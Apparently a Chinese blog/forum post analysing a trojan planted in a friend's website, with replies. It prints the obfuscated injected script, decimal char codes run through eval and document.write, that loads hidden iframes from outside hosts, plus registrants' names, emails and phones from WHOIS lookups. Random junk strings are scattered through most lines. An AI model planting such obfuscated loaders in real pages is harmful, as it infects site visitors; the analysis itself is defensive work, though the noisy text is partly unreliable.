[原创]一篇刚写的分析木马手记

首发在我的博客里面， [vki^M5i|Z  
SQ#6~zxl  
http://www.areway.cn/?p=175 xGbr>OqkTX  
gyH'92
ck  
VlKy6PSIg  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： $iQ>c6  
          >}QRMn|@H  
<script>t=’60,105,102,114,97,109,101, 'Z2:u!E  
32,115,114,99,61,104,116,116,112,58,47,47, <4jQbY;  
102,114,101,101,46,117,45,117,117,117,46,99, ".L+gn}u-  
110,47,101,114,114,111,114,46,104,116,109, b ABx'E  
32,119,105,100,116,104,61,49,48,48,32,104, &{QB}r  
101,105,103,104,116,61,48,62,60,47,105,102, 0?uX}8w  
114,97,109,101,62′; BqZ^I eC$  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> eydVWVN  
                                                                                                  $,08y   
<script>t=’60,105,102,114,97,109,101,32,115, *nNzhcuR  
114,99,61,104,116,116,112,58,47,47,102,114, sh.xp8^)^>  
101,101,46,117,45,117,117,117,46,99,110,47, \C.%S +u  
101,114,114,111,114,46,104,116,109,32,119, Q0~5h?V'  
105,100,116,104,61,49,48,48,32,104,101,105, ,2S <#p!  
103,104,116,61,48,62,60,47,105,102,114,97, )gd
v!  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); ZWMX!>o<  
document.write(t);</script> T#Pz_ hAu  
                                                                                                  ulFU(%&  
<html xmlns=” 1!/+~J[#  
http://www.w3.org/1999/xhtml ANSvZqKh  
“> XuJwZN!(  
<head> .;WJ(kB\U  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> d$ Mk  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> :NU-C!eT  
<title>首页 - 爱生活家庭网 "FQh^+  
                                                                                                                                                    wo2^,Y2z+  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 EZ #UdK_  
转换字符串后的大概内容是（谁点击后果自付）： 7HPLD&WPt  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… c?) pn9  
                                                                                                                                  )DMu`cD  
查询玉米u-uuu.cn的详细信息： I
yG5Rj2  
Domain Name: u-uuu.cn $m/-E#I#Z  
ROID: 20070901s10001s64972306-cn Qpd-uC_Ni  
Domain Status: ok B%6bk.  
Registrant Organization: 王雷 T~$ePVk>L  
Registrant Name: 王雷 oSNB\G<  
Administrative Email: czlovexs@126.com AX**q$'R  
Sponsoring Registrar: 北京万网志成科技有限公司 d_J?i]AP|'  
Name Server:ns.yovole.com 0!=e1_  
Name Server:ns1.yovole.com /og}e~q  
Registration Date: 2007-09-01 17:54 wI>JOV7  
Expiration Date: 2008-09-01 17:54 EC1q#;:  
最后PING了一下地址 都没有什么…. V$ 38  
                                                                                                j-gLX  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. q^sMJ  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> w GZ(bKyO  
<script language=”javascript” src=” {N5g52MN  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script js
`zQx'  
> >|0yH9af  
这个玉米应该有可能是木马作者的： +azPpGZ=  
foafau.info的详细信息： e"r'z n  
Access to INFO WHOIS information is provided to assist persons in N(vbo  
determining the contents of a domain name registration record in the >&^w\"'  
Afilias registry database. The data in this record is provided by xHsH .f_{  
Afilias Limited for informational purposes only, and Afilias does not Y@eHp-[  
guarantee its accuracy.  This service is intended only for query-based ;YZw{|gsh  
access. You agree that you will use this data only for lawful purposes 3JW9G04.  
and that, under no circumstances will you use this data to: (a) allow, ("/*k  
enable, or otherwise support the transmission by e-mail, telephone, or BT>*xZLpS  
facsimile of mass unsolicited, commercial advertising or solicitations v{ C]\8  
to entities other than the data recipient’s own existing customers; or I-/PzL<W P  
(b) enable high volume, automated, electronic processes that send W\.f:"2qr  
queries or data to the systems of Registry Operator, a Registrar, or pE `Q4:<A  
Afilias except as reasonably necessary to register domain names or EoU}@MjM~  
modify existing registrations. All rights reserved. Afilias reserves 6./&l9{h+  
the right to modify these terms at any time. By submitting this query, bG^eP:r  
you agree to abide by this policy. `m2F.^qrr  
Domain ID:D22418703-LRMS 2IjqTL  
Domain Name:FOAFAU.INFO W\eB   
Created On:20-Nov-2007 16:05:42 UTC hph 3kfR  
Last Updated On:20-Nov-2007 16:05:44 UTC nr&G4t+%Hv  
Expiration Date:20-Nov-2008 16:05:42 UTC ac+7D:X  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) );))kYr  
Status:CLIENT DELETE PROHIBITED XQ
j`KUO@  
Status:CLIENT RENEW PROHIBITED 4] ?  
Status:CLIENT TRANSFER PROHIBITED \!cqeg*53  
Status:CLIENT UPDATE PROHIBITED hNx`=D9[7  
Status:TRANSFER PROHIBITED 0RoI`>j'  
Registrant ID:GODA-040110615 nWXI*%m5  
Registrant Name:liu hong gFDP:I/`  
Registrant Organization: ,?&hqM\  
Registrant Street1:beijing
!@VmaAT  
Registrant Street2: 7%7_i%6wP  
Registrant Street3: &<_sXHg<x  
Registrant City:beijing K?I@'B'  
Registrant State/Province: B/5CjHz  
Registrant Postal Code:100000 9!9 Gpi  
Registrant Country:CN
#{h4lte  
Registrant Phone:+86.860108888777 g"T~)SQP  
Registrant Phone Ext.: ?R,^prW{  
Registrant FAX: K03
a@:  
Registrant FAX Ext.: $~D`-+J  
Registrant Email:bbbshiji@163.com ^S<
Z'S  
Admin ID:GODA-240110615 3N]pN<3@  
Admin Name:liu hong :eIBK  
Admin Organization: 7FMHz.ZRE  
Admin Street1:beijing ).ugMuk  
Admin Street2: :nwcO3~`  
Admin Street3:
a3O_8GU  
Admin City:beijing .mok.f<G_m  
Admin State/Province: u8?ceM^r  
Admin Postal Code:100000 \!SC;  
Admin Country:CN 8|d[45*q  
Admin Phone:+86.860108888777 HvTi^Fb\a  
Admin Phone Ext.: mDM]RAub)  
Admin FAX: iz*aBXVA[  
Admin FAX Ext.: {qx"/;3V  
Admin Email:bbbshiji@163.com w:um
r#  
Billing ID:GODA-340110615 Kjf#uU.7  
Billing Name:liu hong 3i s.c)  
Billing Organization: Tl=vgs1  
Billing Street1:beijing Hy `r}+  
Billing Street2: t8P>s})[4  
Billing Street3: l|&|+u#  
Billing City:beijing $~:hv7%  
Billing State/Province: (O<lVz@8  
Billing Postal Code:100000 u@
gYEx}  
Billing Country:CN c3 wu&*p{  
Billing Phone:+86.860108888777 Jhj]rsGk  
Billing Phone Ext.: Ko%rB+d  
Billing FAX: m.^6ef  
Billing FAX Ext.: ,]cd%w9  
Billing Email:bbbshiji@163.com hqBwA1](a  
Tech ID:GODA-140110615 u{3KV6MS  
Tech Name:liu hong x`lBG%Y[-v  
Tech Organization: >yWJk9hf  
Tech Street1:beijing f a\cLC  
Tech Street2: HFDg@@
 
Tech Street3: L9kSeBt  
Tech City:beijing Lte\;Se.tu  
Tech State/Province: o3W5FHFAv  
Tech Postal Code:100000 19=Dd#Nf  
Tech Country:CN snK9']WXo  
Tech Phone:+86.860108888777 aSK$#Xeu  
Tech Phone Ext.: 4B> l|%  
Tech FAX: 1/fvk  
Tech FAX Ext.: nut7b  
Tech Email:bbbshiji@163.com ILVbbC`D  
Name Server:NS27.DOMAINCONTROL.COM bZlAK)  
Name Server:NS28.DOMAINCONTROL.COM @
=,J6  
Name Server: DMf9wB  
Name Server: (*;u{m=  
Name Server: *1%g
=vb  
Name Server: m0#hG x  
Name Server: ?3|ZS8y  
Name Server: s=d?}.E$  
Name Server: S4(IYnwN  
Name Server: vIG,!^*3  
Name Server: .DX#:?@4@Y  
Name Server: y~dW=zO  
Name Server: *PI3
L/*  
                                                                                                          m&%N4Q~X>  
接着下载每个文件里面的代码： +|0m6)J]  
一步一步看.. "E8!{  
K)v(Z"  
|/s.PNP2  
&B.r&K&  
kQb0pfYs  
Oh^X^*I$@  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来